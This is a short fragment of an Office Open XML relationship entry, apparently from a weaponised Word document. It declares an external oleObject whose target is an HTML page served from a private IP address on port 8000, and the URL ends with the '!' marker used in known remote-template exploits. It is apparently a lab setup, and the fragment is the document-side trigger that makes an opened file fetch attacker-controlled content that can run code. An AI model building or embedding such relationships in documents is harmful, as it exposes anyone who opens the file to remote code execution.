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96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://192.168.72.129:8000/index.html!" TargetMode="Externa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